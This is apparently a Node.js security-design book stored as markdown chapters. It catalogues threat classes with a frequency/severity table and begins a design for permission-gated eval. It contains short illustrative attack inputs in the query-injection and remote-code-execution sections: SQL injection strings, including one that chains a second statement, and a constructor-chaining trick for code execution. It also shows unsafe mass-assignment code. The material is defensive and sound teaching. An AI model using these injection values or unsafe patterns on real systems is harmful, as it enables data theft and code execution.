--------------------------------------------------------------------------------
 1 | # Buffer Overflow
 2 | 
 3 | A buffer overflow occurs when code fails to check an index into an
 4 | array while unpacking input, allowing parts of that input to overwrite
 5 | memory locations that other trusted code assumes are inviolable.
 6 | A similar technique also allows exfiltrating data like cryptographic keys
 7 | when an unchecked limit leads to copying unintended memory locations into
 8 | an output.
 9 | 
10 | Buffer overflow vectors in Node.js are:
11 | 
12 | *  The Node.js runtime and dependencies like the JS runtime and OpenSSL
13 | *  [C++ addons][] third-party modules that use N-API (the native API).
14 | *  Child processes.  For example, code may route a request body to an
15 |    [image processing library][imagetragick] that was not
16 |    written with untrusted inputs in mind.
17 | 
18 | Buffer overflows are common, but we class them as low frequency for
19 | Node.js in particular.  The runtime is highly reviewed compared to the
20 | average C++ backend; C++ addons are a small subset of third-party
21 | modules; and there's no reason to believe that child processes spawned
22 | by Node.js applications are especially risky.
23 | 
24 | [imagetragick]: https://imagetragick.com/
25 | [C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons
26 | 


--------------------------------------------------------------------------------
/chapter-1/threat-CRY.md:
--------------------------------------------------------------------------------
 1 | # Weak Crypto {#CRY}
 2 | 
 3 | Cryptographic primitives are often the only practical way to solve
 4 | important classes of problems, but it's easy to make mistakes when using
 5 | `crypto.*` APIs.
 6 | Failing to identify third-party modules that use crypto (or should be
 7 | using crypto) and determining whether they are using it properly can lead
 8 | to a false sense of security.
 9 | 
10 | ["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel
11 | notes:
12 | 
13 | > The field of cryptography is inherently difficult. Cryptographic API
14 | > development involves narrowing a large, complex field into a small set
15 | > of usable functions.  Unfortunately, these APIs are often far from
16 | > simple.
17 | 
18 | > ...
19 | 
20 | > In 2013, study by Egele et al. revealed even more startling figures
21 | > [1]. In this study, six rules were defined which, if broken, indicated
22 | > the use of insecure protocols. More than 88% of the 11,000 apps
23 | > analyzed broke at least one rule. Of the rule-breaking apps, most
24 | > would break not just one, but multiple rules. Some of these errors
25 | > were attributed to negligence, for example test code included in
26 | > release versions. However, in most cases it appears developers
27 | > unknowingly created insecure apps.
28 | 
29 | > ...
30 | 
31 | > The human aspect can be improved through better education for
32 | > developers.  Sadly, this approach is unlikely to be a complete
33 | > solution. It is unreasonable to expect a developer to be a security
34 | > expert when most of their time is spent on other aspects of software
35 | > design.
36 | 
37 | Code that uses cryptography badly can seem like it's working as intended
38 | until an attacker unravels it.
39 | Testing code that uses cryptographic APIs is hard.  It's hard to write
40 | a unit test to check that a skilled cryptographer can't efficiently
41 | extract information from a random looking string or compute a random
42 | looking string that passes a verifier.
43 | 
44 | Weak cryptography can also mask other problems.  For example, a
45 | security auditor might try to check for leaks of email addresses by
46 | creating a dummy account `Carol <carol@example.com>` and
47 | check for the string `carol@example.com` in data served in responses,
48 | while recursing into substrings encoded using base64, gzip, or other
49 | common encodings.
50 | If some of that data is poorly encrypted, then the auditor might
51 | falsely conclude that an attacker who can't break strong
52 | encryption does not have access to emails.
53 | 
54 | [Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf
55 | 


--------------------------------------------------------------------------------
/chapter-1/threat-DEX.md:
--------------------------------------------------------------------------------
 1 | # Poor Developer Experience
 2 | 
 3 | Security specialists have a vested interest in keeping developers
 4 | happy & productive.
 5 | 
 6 | Developer experience is not only a business or usability threat.  When
 7 | a team is less agile, it cannot respond as effectively to security
 8 | threats, or roll out interfaces that let end users manage their own
 9 | security and privacy.
10 | 
11 | Application developers may miss deadlines, cut features, or
12 | compromise maintainability if any of the following are true:
13 | 
14 | *  starting a new project takes too long
15 | *  they often cannot make progress until they get feedback from
16 |    security specialists (or other specialists like I18N, Legal, UI)
17 | *  repeated tasks are slow:
18 |    *  restarting an application or service,
19 |    *  running `npm install`, or
20 |    *  rerunning tests after small changes
21 | *  getting approval for a pull request takes long enough that
22 |    upstream has to be manually merged into the branch.
23 | *  breaking common code out of an application into an npm
24 |    module becomes hard, so it is easier to copy-paste from one
25 |    application to another
26 | *  a developer has to spend significant time getting a release
27 |    candidate approved instead of working on the next iteration.
28 | 


--------------------------------------------------------------------------------
/chapter-1/threat-DOS.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # Denial of Service
 3 | 
 4 | Denial of service occurs when a well-behaved, authorized user cannot
 5 | access a system because of misbehavior by another.
 6 | 
 7 | "Denial of service" is most often associated with [flooding][] a
 8 | network endpoint so it cannot respond to the smaller number of
 9 | legitimate requests, but there are other vectors:
10 | 
11 | *  Causing the server to use up [a finite resource][res-exh]
12 |    like file descriptors causing threads to block.
13 | *  Causing the target to issue a network request to an endpoint the
14 |    attacker controls and responding slowly.
15 | *  Causing the target to store malformed data which triggers an error
16 |    in code that unpacks the stored data and causes a server to provide
17 |    an error response to a well-formed request.
18 | *  Exploiting event dispatch bugs to cause starvation
19 |    ([example][disclosure]).
20 | *  Supplying over-large inputs to super-linear (> O(n)) algorithms.
21 |    For example supplying a crafted string to an ambiguous `RegExp`
22 |    to cause [excessive backtracking][].
23 | 
24 | Denial of service attacks that exploit the network layer are usually
25 | handled in the reverse proxy and we find no reason to suppose that
26 | node applications are especially vulnerable to other kinds of denial
27 | of service.
28 | 
29 | ## Additional risk: Integrity depends on quick completion
30 | 
31 | A system requires [atomicity][] when two or more effects have to
32 | happen together or not at all.  Databases put a lot of engineering
33 | effort into ensuring atomicity.
34 | 
35 | Sometimes, ad-hoc code seems to preserve atomicity when tested under
36 | low-load conditions:
37 | 
38 | ```js
39 | // foo() and bar() need to happen together or not at all.
40 | foo(x);
41 | // Not much of a gap here under normal conditions for another part
42 | // of the system to observe foo() but not bar().
43 | try {
44 |   bar(x);
45 | } catch (e) {
46 |   undoFoo();
47 |   throw e;
48 | }
49 | ```
50 | 
51 | This code, though buggy, may be highly reliable under normal
52 | conditions, but may fail under load, or if an attacker can cause
53 | `bar()` to run for a while before its side-effect happens, for example
54 | by causing excessive backtracking in a regular expression used to
55 | check a precondition.
56 | 
57 | Some of the same techniques which makes a system unavailable can
58 | widen the window of vulnerability within which an attacker can exploit
59 | an atomicity failure.
60 | 
61 | Client-side, runaway computations rarely escalate into an integrity
62 | violation since atomicity requirements are typically maintained on the
63 | server.  Server-side, we expect that this problem would be more
64 | common.
65 | 
66 | [flooding]: https://capec.mitre.org/data/definitions/125.html
67 | [excessive backtracking]: https://www.regular-expressions.info/catastrophic.html
68 | [res-exh]: https://capec.mitre.org/data/definitions/131.html
69 | [disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug
70 | [atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity
71 | 


--------------------------------------------------------------------------------
/chapter-1/threat-EXF.md:
--------------------------------------------------------------------------------
 1 | # Exfiltration of Data
 2 | 
 3 | "Exfiltration" happens when an attacker causes a response to include
 4 | data that it should not have.  Web applications and services may
 5 | produce response bodies that include too much information.
 6 | 
 7 | This can happen when server-side JavaScript has access to more
 8 | data than it needs to do its job and either
 9 | 
10 | *  it serializes unintended information and no one notices or
11 | *  an attacker controls what is serialized.
12 | 
13 | Consider
14 | 
15 | ```js
16 | Object.assign(output, this[str]);
17 | ```
18 | 
19 | If the attacker controls `str` then they may be able to pick any field
20 | of `this` or possibly any global field.
21 | 
22 | This problem is not new to Node.js but we consider this higher
23 | frequency for Node.js for these reasons:
24 | 
25 | *  There is no equivalent to `Object.assign` in most backend languages.
26 |    It's possible in Python and Java via reflective operators but
27 |    security auditors can narrow down code that might suffer this vulnerability
28 |    to those that use reflection.
29 |    `Object.assign`, `$.extend` and similar operators are widely used in
30 |    idiomatic JavaScript.
31 | *  In most backend languages, `obj[...]` does not allow aliasing of all
32 |    properties.
33 |    For example, Python allows `obj[...]` on types that implement `__getitem__`
34 |    which is not the case for user-defined classes.
35 |    Java has generic collections and maps, but for user-defined classes
36 |    the equivalent code pattern requires reflection and possibly calls to
37 |    `setAccessible(true)`.
38 | 
39 | JavaScript makes it easier to alias properties and methods and common
40 | JavaScript idioms make it harder for security auditors to narrow down
41 | code that might inadvertently allow exfiltration.
42 | 
43 | `Object.assign` and related copy operators are also potential
44 | [mass assignment][] vectors as in:
45 | 
46 | ```js
47 | Object.assign(systemData, JSON.parse(untrustedInput))
48 | ```
49 | 
50 | [mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability
51 | 


--------------------------------------------------------------------------------
/chapter-1/threat-LQC.md:
--------------------------------------------------------------------------------
 1 | # Low Quality Code
 2 | 
 3 | An application or service is vulnerable when its security depends on a
 4 | module upholding a contract that it does not uphold.
 5 | 
 6 | Most new software has bugs when first released.  Over time, maintainers
 7 | fix the bugs that have obvious, bad consequences.
 8 | 
 9 | Often, widely used software has problem areas that are well understood.
10 | Developers can make a pragmatic decision to use it while taking
11 | additional measures to make sure those problems don't compromise
12 | security guarantees.
13 | 
14 | Orphaned code that has not been updated recently may have done a
15 | good job of enforcing its contract, but attackers may have discovered
16 | new tricks, or the threat environment may have changed so it may
17 | no longer enforce its contract in the face of an attack.
18 | 
19 | Low quality code constitutes a threat when developers pick a module
20 | without understanding the caveats to the contract it actually
21 | provides, or without taking additional measures to limit damage when
22 | it fails.
23 | 
24 | It may be the case that there's higher risk of poorly understood
25 | contracts when a community is experimenting rapidly as is the case for
26 | Node.js, or early on before the community has settled on clear winners
27 | for core functions, but we consider the frequency of vulnerabilities
28 | due to low quality code in the npm repository roughly the same as for
29 | other public module repositories.
30 | 


--------------------------------------------------------------------------------
/chapter-1/threat-MTP.md:
--------------------------------------------------------------------------------
 1 | # Malicious Third-Party Code
 2 | 
 3 | Most open-source developers work in good faith to provide useful tools
 4 | to the larger community of developers but
 5 | 
 6 | *  Passwords are easy to guess, so attackers can suborn accounts that
 7 |    are only protected by a password.  On GitHub, developers may
 8 |    configure their accounts to require a
 9 |    [second factor][github-second-factor] but this is not yet the norm.
10 | *  Pull requests that aren't thoroughly reviewed may dilute security
11 |    properties.
12 | *  Phishing requests targeted at GitHub users ([details][dimnie]) can
13 |    execute code on unwary committers' machines.
14 | *  A pull request may appear to come  from a higher-reputation source
15 |    ([details][unsigned commits]).
16 | 
17 | Malicious code can appear in the server-side JavaScript running in
18 | production, or can take the form of install hooks that run on a
19 | developer workstation with access to local repositories and to
20 | writable elements of `$PATH`.
21 | 
22 | Projects that deploy the latest version of a dependency straight to
23 | production are more vulnerable to malicious code.  If an attacker
24 | manages to publish a version with malicious code which is quickly
25 | discovered, it affects projects that deploy during that short "window
26 | of vulnerability."  Projects that `npm install` the latest version
27 | straight to production are more likely to fall in that window than
28 | projects that cherrypick versions or that shrinkwrap to make sure that
29 | their development versions match deployed versions.
30 | 
31 | [Bower is deprecated][bower-depr] so our discussions focus on
32 | `npmjs.org`, but it's worth noting that Bower has a single-point of
33 | failure.  Anyone who can create a release branch can commit and
34 | publish a new version.
35 | 
36 | [`npm profile`][npm profile] allows requiring
37 | [two factor auth][npm auth-and-writes] for publishing and privilege
38 | changes.  If the npm accounts that can publish new versions of a
39 | package only checkout code from a GitHub account all of whose
40 | committers use two factors, then there is no single password that can
41 | compromise the system.
42 | 
43 | The frequency of malicious code vulnerabilities affecting Node.js is
44 | probably roughly the same as that for other public module repositories.
45 | The npm repo has been a target in the past [1][getcookies-disclosure]
46 | [2][crossenv-typosquat-disclosure].
47 | 
48 | The [npm Blog][crossenv-typosquat-disclosure] explains what to do if
49 | you believe you have found malicious code:
50 | 
51 | > On August 1, a user notified us via Twitter that a package with a
52 | > name very similar to the popular `cross-env` package was sending
53 | > environment variables from its installation context out to
54 | > npm.hacktask.net. We investigated this report immediately and took
55 | > action to remove the package. Further investigation led us to remove
56 | > about 40 packages in total.
57 | >
58 | > ...
59 | >
60 | > Please do reach out to us immediately if you find malware on the
61 | > registry. The best way to do so is by sending email to
62 | > [security@npmjs.com](mailto:security@npmjs.com). We will act to
63 | > clean up the problem and find related problems if we can.
64 | 
65 | 
66 | [github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/
67 | [bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/
68 | [dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
69 | [unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html
70 | [npm profile]: https://docs.npmjs.com/cli/profile
71 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
72 | [npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication
73 | [getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies
74 | [crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry
75 | 


--------------------------------------------------------------------------------
/chapter-1/threat-QUI.md:
--------------------------------------------------------------------------------
 1 | # Query Injection
 2 | 
 3 | [Query injection][] occurs when an attacker causes a query sent to a
 4 | database or other backend to have a [structure][spp] that differs from
 5 | that the developer intended.
 6 | 
 7 | ```js
 8 | connection.query(
 9 |     'SELECT * FROM Table WHERE key="' + value + '"',
10 |     callback);
11 | ```
12 | 
13 | If an attacker controls `value` and can cause it to contain a single
14 | quote, then they can cause execution of a query with a different structure.
15 | For example, if they can cause
16 | 
17 | ```js
18 | value = ' " OR 1 -- two dashes start a line comment';
19 | ```
20 | 
21 | then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...`
22 | which returns more rows than intended possibly [leaking](./threat-EXF.md)
23 | data that the requester should not have been able to access, and may
24 | cause other code that loops over the result set to modify rows other than
25 | the ones the system's authors intended.
26 | 
27 | Some backends allow statement chaining so compromising a statement
28 | that seems to only read data:
29 | 
30 | ```js
31 | value = '"; INSERT INTO Table ...  --'
32 | ```
33 | 
34 | can violate system integrity by forging records:
35 | 
36 | ```js
37 | ' SELECT * FROM Table WHERE key="' + value + '" ' ===
38 | ' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" '
39 | ```
40 | 
41 | or deny service via mass deletes.
42 | 
43 | Query injection has a [long and storied history][hall-of-shame].
44 | 
45 | [Query injection]: http://bobby-tables.com/
46 | [hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
47 | [spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property
48 | 


--------------------------------------------------------------------------------
/chapter-1/threat-RCE.md:
--------------------------------------------------------------------------------
 1 | # Remote Code Execution
 2 | 
 3 | Remote code execution occurs when the application interprets an
 4 | untrustworthy string as code.  When `x` is a string, `eval(x)`,
 5 | `Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript
 6 | engine's parser on `x`.  If an attacker controls `x` then they can run
 7 | arbitrary code in the context of the CommonJS module or `vm` context
 8 | that invoked the parser.
 9 | 
10 | Sandboxing can help but widely available sandboxes have
11 | [known workarounds][denicola-vm-run] though the [frozen realms][]
12 | proposal aims to change that.
13 | 
14 | It is harder to execute remote code in server-side JavaScript.
15 | `this[x][y] = "javascript:console.log(1)"` does not cause code to
16 | execute for nearly as many `x` and `y` as in a browser.
17 | 
18 | These operators are probably rarely used *explicitly*, but some
19 | operators that convert strings to code when given a string do
20 | something else when given a `Function` instance.  `setTimeout(x, 0)`
21 | is safe when `x` is a function, but on the browser it parses a string
22 | input as code.
23 | 
24 | *  [Grepping](../appendix/experiments.md#grep-problems) shows the rate
25 |    in the top 100 modules and their transitive dependencies by simple
26 |    pattern matching after filtering out comments and string content.
27 |    This analysis works on most modules, but fails to distinguish
28 |    safe uses of `setTimeout` in modules that might run on
29 |    the client from unsafe.
30 | *  A [type based analysis](../appendix/experiments.md#jsconf) can
31 |    distinguish between those two, but the tools we tested don't
32 |    deal well with mixed JavaScript and TypeScript inputs.
33 | 
34 | Even if we could reliably identify places where strings are
35 | *explicitly* converted to code for the bulk of npm modules,
36 | it is more difficult in JavaScript to statically prove that
37 | code does not *implicitly* invoke a parser than in other
38 | common backend languages.
39 | 
40 | ```js
41 | // Let x be any value not in
42 | // (null, undefined, Object.create(null)).
43 | var x = {},
44 | // If the attacker can control three strings
45 |     a = 'constructor',
46 |     b = 'constructor',
47 |     s = 'console.log(s)';
48 | // and trick code into doing two property lookups
49 | // they control, a call with a string they control,
50 | // and one more call with any argument
51 | x[a][b](s)();
52 | // then they can cause any side-effect achievable
53 | // solely via objects reachable from the global scope.
54 | // This includes full access to any exported module APIs,
55 | // all declarations in the current module, and access
56 | // to builtin modules like child_process, fs, and net.
57 | ```
58 | 
59 | Filtering out values of `s` that "look like JavaScript" as they reach
60 | server-side code will probably not prevent code execution.
61 | [Yosuke Hasegawa][Yosuke] how to reencode arbitrary JavaScript using
62 | only 6 punctuation characters, and that number may
63 | [fall to 5][Masato].  ["Web Application Obfuscation"][obfusc] by
64 | Heiderich et al. catalogues ways to bypass filtering.
65 | 
66 | `eval` also allows remote-code execution in Python, PHP, and
67 | Ruby code, but in those languages `eval` operators are harder to
68 | mention implicitly which means uses are easier to check.
69 | 
70 | It is possible to dynamically evaluate strings even in statically
71 | compiled languages, for example, [JSR 223][] and
72 | [`javax.compiler`][dynjava] for Java.  In statically compiled
73 | languages there is no short implicit path to `eval` and it is not
74 | easier to `eval` an untrusted input than to use an intepreter that is
75 | isolated from the host environment.
76 | 
77 | We consider remote code execution in Node.js lower frequency than for
78 | client-side JavaScript without a Content-Security-Policy but higher
79 | than for other backend languages.  We consider the severity the same
80 | as for other backend languages.  The serverity is higher than for
81 | client-side JavaScript because backend code often has access to more
82 | than one user's data and privileged access to other backends.
83 | 
84 | [denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0
85 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
86 | [Yosuke]: https://news.ycombinator.com/item?id=4370098
87 | [Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
88 | [obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049
89 | [JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html
90 | [dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html
91 | 


--------------------------------------------------------------------------------
/chapter-1/threat-SHP.md:
--------------------------------------------------------------------------------
 1 | # Shell Injection during Production
 2 | 
 3 | [Shell injection][] occurs when an attacker-controlled string changes
 4 | the structure of a command passed to a shell or causes a child process
 5 | to execute an unintended command or with unintended arguments.
 6 | Typically, this is because code or a dependency invokes
 7 | [child\_process][api/child_process] with an argument partially
 8 | composed from untrusted inputs.
 9 | 
10 | Shell injection may also occur during development and deployment.  For
11 | example, [npm][npm hooks] and [Bower][bower hooks]
12 | `{pre-,,post-}install` hooks may be subject to shell injection via
13 | filenames that contain shell meta-characters in malicious transitive
14 | dependencies but we classify this as an [MTP][] vulnerability.
15 | 
16 | [MTP]: threat-MTP.md
17 | [npm hooks]: https://docs.npmjs.com/misc/scripts
18 | [bower hooks]: https://bower.io/docs/config/#hooks
19 | [Shell injection]: http://cwe.mitre.org/data/definitions/77.html
20 | [api/child_process]: https://nodejs.org/api/child_process.html
21 | 


--------------------------------------------------------------------------------
/chapter-1/threats.md:
--------------------------------------------------------------------------------
  1 | # Threat environment
  2 | 
  3 | The threat environment for Node.js is similar to that for other runtimes that
  4 | are primarily used for microservices and web frontends, but there are some
  5 | Node.js specific concerns.
  6 | 
  7 | We define both kinds of threats in this section.  A reader familiar with
  8 | web-application security can skip all but this page and the discussion
  9 | of [*unintended require*][UIR] without missing much, but may find it
 10 | helpful to refer back to the table below when reading later chapters.
 11 | 
 12 | ## Server vs Client-side JavaScript
 13 | 
 14 | Before we discuss the threat environment, it's worth noting that the threat
 15 | environment for server-side JavaScript is quite different from that for
 16 | client-side JavaScript.  For example,
 17 | 
 18 | * Client-side JavaScript runs in the context of the
 19 |   [same-origin policy][] possibly with a
 20 |   [Content-Security-Policy][CSP] which governs which code can load.
 21 |   Server-side JavaScript **code loading** is typically only
 22 |   constrained by the files on the server, and the values that can
 23 |   reach `require(...)`, `eval(...)` and similar operators.
 24 | * Client-side JavaScript typically only has access to data that the
 25 |   human using the browser should have access to.  On the server,
 26 |   applications are responsible for **data [compartmentalization][]**,
 27 |   and server-side JavaScript often has privileged access to storage
 28 |   systems and other backends.
 29 | * **File-system access** by the client typically either requires human
 30 |   interaction
 31 |   (`<input type=file>`, `Content-disposition:attachment`), or can only access
 32 |   a directory dedicated to third-party content (browser cache, local storage)
 33 |   and which is not usually on a list like `$PATH`.
 34 |   On the server, the Node runtime process's privileges determine
 35 |   [file-system access][nodejs/fs].
 36 | * Client-side JavaScript has no concept of a **shell** that converts
 37 |   strings into commands that runs outside the JavaScript engine.
 38 |   Server-side JavaScript can spawn
 39 |   [child processes][nodejs/child_process] that operate on data
 40 |   received over the network, and on data that is accessible to the
 41 |   Node runtime process.
 42 | * **Network messages** sent by server-side JavaScript originate inside
 43 |   the server's LAN, but those sent by client-side JavaScript typically do not.
 44 | * **Shared memory concurrency** in client-side JavaScript happens via
 45 |   well-understood APIs like `SharedArrayBuffer`.  Experimental modules
 46 |   ([code][threads-a-gogo]) and a [workers proposal][]
 47 |   allow server-side JavaScript to fork threads; it is
 48 |   unclear how widespread these are in production or how
 49 |   [susceptible][thread corner cases] these are to memory corruption
 50 |   or exploitable race conditions.
 51 | * Client-side, the browser halts all scripts in a document when a
 52 |   single event loop cycle **runs too long**.
 53 |   Node.js has few ways to manage runaway computations on the server.
 54 | 
 55 | The threat environment for server-side JavaScript is much closer to
 56 | that for any other server-side framework than JavaScript in the
 57 | browser.
 58 | 
 59 | ## Classes of Threats {#threat_table}
 60 | 
 61 | The table below lists broad classes of vulnerabilities, and for each,
 62 | a short identifier by which we refer to the class later in this
 63 | document.  This list is not meant to be comprehensive, but we expect
 64 | that a thorough security assessment would touch on most of these and
 65 | would have low confidence in an assessment that skips many.
 66 | 
 67 | The frequency and severity of vulnerabilities are guesstimates since
 68 | we have little hard data on the frequency of these in Node.js
 69 | applications, so have extrapolated from similar systems.  For example,
 70 | see discussion about frequency in [buffer overflow][BOF].
 71 | 
 72 | For each, relevant mitigation strategies appear in the mitigations
 73 | columns, and link to the discussion.
 74 | 
 75 | | Shorthand | Description                                                                           | Frequency | Severity | Mitigations                 |
 76 | | --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- |
 77 | | [0DY][]   | Zero-day.  Attackers exploit a vulnerability before a fix is available.               | Low-Med   | Med-High | [cdeps][m-cd] [fail][m-fa]  |
 78 | | [BOF][]   | Buffer overflow.                                                                      | Low       | High     | [ovrsi][m-os]               |
 79 | | [CRY][]   | Misuse of crypto leads to poor access-control decisions or data leaks.                | Medium    | Medium   | [ovrsi][m-os]               |
 80 | | [DEX][]   | Poor developer experience slows or prevents release of features.                      | ?         | ?        | [dynam][m-dy] [ovrsi][m-os] |
 81 | | [DOS][]   | Denial of service                                                                     | Medium    | Low-Med  | TBD                         |
 82 | | [EXF][]   | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended.  | Med-High  | Low-Med  | [ovrsi][m-os]               |
 83 | | [LQC][]   | Using low quality dependencies leads to exploit                                       | Medium    | Low-Med  | [kdeps][m-kd] [ovrsi][m-os] |
 84 | | [MTP][]   | Theft of commit rights or MITM causes `npm install` to fetch malicious code.          | Low       | Med-High | [kdeps][m-kd] [cdeps][m-cd] |
 85 | | [QUI][]   | Query injection on a production machine.                                              | Medium    | Med-High | [ovrsi][m-os] [qlang][m-ql] |
 86 | | [RCE][]   | Remote code execution, e.g. via `eval`                                                | Med-High  | High     | [dynam][m-dy] [ovrsi][m-os] |
 87 | | [SHP][]   | Shell injection on a production machine.                                              | Low       | High     | [ovrsi][m-os] [cproc][m-cp] |
 88 | | [UIR][]   | `require(untrustworthyInput)` loads code not intended for production.                 | Low       | Low-High | [dynam][m-dy]               |
 89 | 
 90 | 
 91 | ## Meltdown and Spectre
 92 | 
 93 | As of this writing, the security community is trying to digest
 94 | the implications of *Meltdown* and *Spectre*.  The
 95 | [Node.js blog][Meltdown Spectre Impact] addresses them from a
 96 | Node.js perspective, so we do not comment in depth.
 97 | 
 98 | It is worth noting though that those vulnerabilities lead to
 99 | breaches of *confidentiality*.  While confidentiality violations
100 | are serious, the suggestions that follow use design principles
101 | that prevent a violation of confidentiality from causing a
102 | violation of *integrity*.  Specifically:
103 | 
104 | *  Knowing a whitelist of production source hashes does not
105 |    allow an attacker to cause a non-production source to load.
106 | *  Our runtime `eval` mitigation relies on JavaScript reference
107 |    equality, not knowledge of a secret.
108 | 
109 | 
110 | [same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
111 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
112 | [compartmentalization]: https://cwe.mitre.org/data/definitions/653.html
113 | [nodejs/fs]: https://nodejs.org/api/fs.html
114 | [nodejs/child_process]: https://nodejs.org/api/child_process.html
115 | [threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387
116 | [workers proposal]: https://github.com/nodejs/worker/issues/2
117 | [thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967
118 | [Query Injection]: https://cwe.mitre.org/data/definitions/89.html
119 | [0DY]: threat-0DY.md
120 | [BOF]: threat-BOF.md
121 | [CRY]: threat-CRY.md
122 | [DEX]: threat-DEX.md
123 | [DOS]: threat-DOS.md
124 | [EXF]: threat-EXF.md
125 | [LQC]: threat-LQC.md
126 | [MTP]: threat-MTP.md
127 | [QUI]: threat-QUI.md
128 | [RCE]: threat-RCE.md
129 | [SHP]: threat-SHP.md
130 | [UIR]: threat-UIR.md
131 | [m-dy]: ../chapter-2/dynamism.md
132 | [m-kd]: ../chapter-3/knowing_dependencies.md
133 | [m-cd]: ../chapter-4/close_dependencies.md
134 | [m-os]: ../chapter-5/oversight.md
135 | [m-fa]: ../chapter-6/failing.md
136 | [m-cp]: ../chapter-7/child-processes.md
137 | [m-ql]: ../chapter-7/query-langs.md
138 | [Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/
139 | 


--------------------------------------------------------------------------------
/chapter-2/bounded-eval.md:
--------------------------------------------------------------------------------
  1 | # Dynamically bounding `eval`
  2 | 
  3 | If we could provide an API that was available statically, but not dynamically
  4 | we could double-check uses of `eval` operators.
  5 | 
  6 | ```js
  7 | // API for allowing some eval
  8 | var prettyPlease = require('prettyPlease');
  9 | // Carefully reviewed JavaScript generating code
 10 | var codeGenerator = require('codeGenerator');
 11 | 
 12 | let compile;
 13 | 
 14 | prettyPlease.mayI(
 15 |     module,
 16 |     (evalPermission) => {
 17 |       compile = function (source) {
 18 |         const js = codeGenerator.generateCode(source);
 19 |         return prettyPlease.letMeEval(
 20 |             evalPermission,
 21 |             js,
 22 |             () => ((0, eval)(js)));
 23 |       };
 24 |     });
 25 | 
 26 | exports.compile = compile;
 27 | ```
 28 | 
 29 | The `prettyPlease` module cannot be pure JavaScript since only the
 30 | C++ linker can take advantage of *CodeGeneration* callbacks
 31 | ([code][CodeGeneration callbacks]) the way CSP does
 32 | ([code][CSP callback]) on the client, but the definition would be
 33 | roughly:
 34 | 
 35 | ```js
 36 | // prettyPlease module
 37 | (() => {
 38 |   const _PERMISSIVE_MODE = 0;  // Default
 39 |   const _STRICT_MODE = 1;
 40 |   const _REPORT_ONLY_MODE = 2;
 41 | 
 42 |   const _MODE = /* From command line arguments */;
 43 |   const _WHITELIST = new Set(/* From command line arguments */);
 44 | 
 45 |   const _VALID_PERMISSIONS = new WeakSet();
 46 |   const _EVALABLE_SOURCES = new Map();
 47 | 
 48 |   if (_MODE !== _PERMISSIVE_MODE) {
 49 |     // Pseudocode: the code-generation callback installed when the
 50 |     // JavaScript engine is initialized.
 51 |     function codeGenerationCheckCallback(context, source) {
 52 |       // source must be a v8::Local<v8::string> or ChakraCore equivalent
 53 |       // so no risk of polymorphing
 54 |       if (_EVALABLE_SOURCES.has(source)) {
 55 |         return true;
 56 |       }
 57 |       console.warn(...);
 58 |       return _MODE == _REPORT_ONLY_MODE;
 59 |     }
 60 |   }
 61 | 
 62 |   // requestor -- the `module` value in the scope of the code requesting
 63 |   //      permissions.
 64 |   // callback -- called with the generated permission whether granted or
 65 |   //      not.  This puts the permission in a parameter name making it
 66 |   //      much less likely that an attacker who controls a key to obj[key]
 67 |   //      can steal it.
 68 |   module.mayI = function (requestor, callback) {
 69 |     const id = String(requestor.id);
 70 |     const filename = String(requestor.filename);
 71 |     const permission = Object.create(null);  // Token used for identity
 72 |     // TODO: Needs privileged access to real module cache so a module
 73 |     // can't masquerade as another by mutating the module cache.
 74 |     if (_MODE !== _PERMISSIVE_MODE
 75 |         && requestor === require.cache[filename]
 76 |         && _WHITELIST.has(id)) {
 77 |       _VALID_PERMISSIONS.add(permission);
 78 |       // Typical usage is to request permission once during module load.
 79 |       // Removing from whitelist prevents later bogus requests after
 80 |       // the module is exposed to untrusted inputs.
 81 |       _WHITELIST.delete(id);
 82 |     }
 83 |     return callback(permission);
 84 |   };
 85 | 
 86 |   // permission -- a value received via mayI
 87 |   // sourceToEval -- code to eval.  The code generation callback will
 88 |   //                 expect this exact string as its source.
 89 |   // codeThatEvals -- a callback that will be called in a scope that
 90 |   //                  allows eval of sourceToEval.
 91 |   module.letMeEval = function (permission, sourceToEval, codeThatEvals) {
 92 |     sourceToEval = String(sourceToEval);
 93 |     if (_MODE === _PERMISSIVE_MODE) {
 94 |       return codeThatEvals();
 95 |     }
 96 | 
 97 |     if (!_VALID_PERMISSIONS.has(permission)) {
 98 |       console.warn(...);
 99 |       if (_MODE !== _REPORT_ONLY_MODE) {
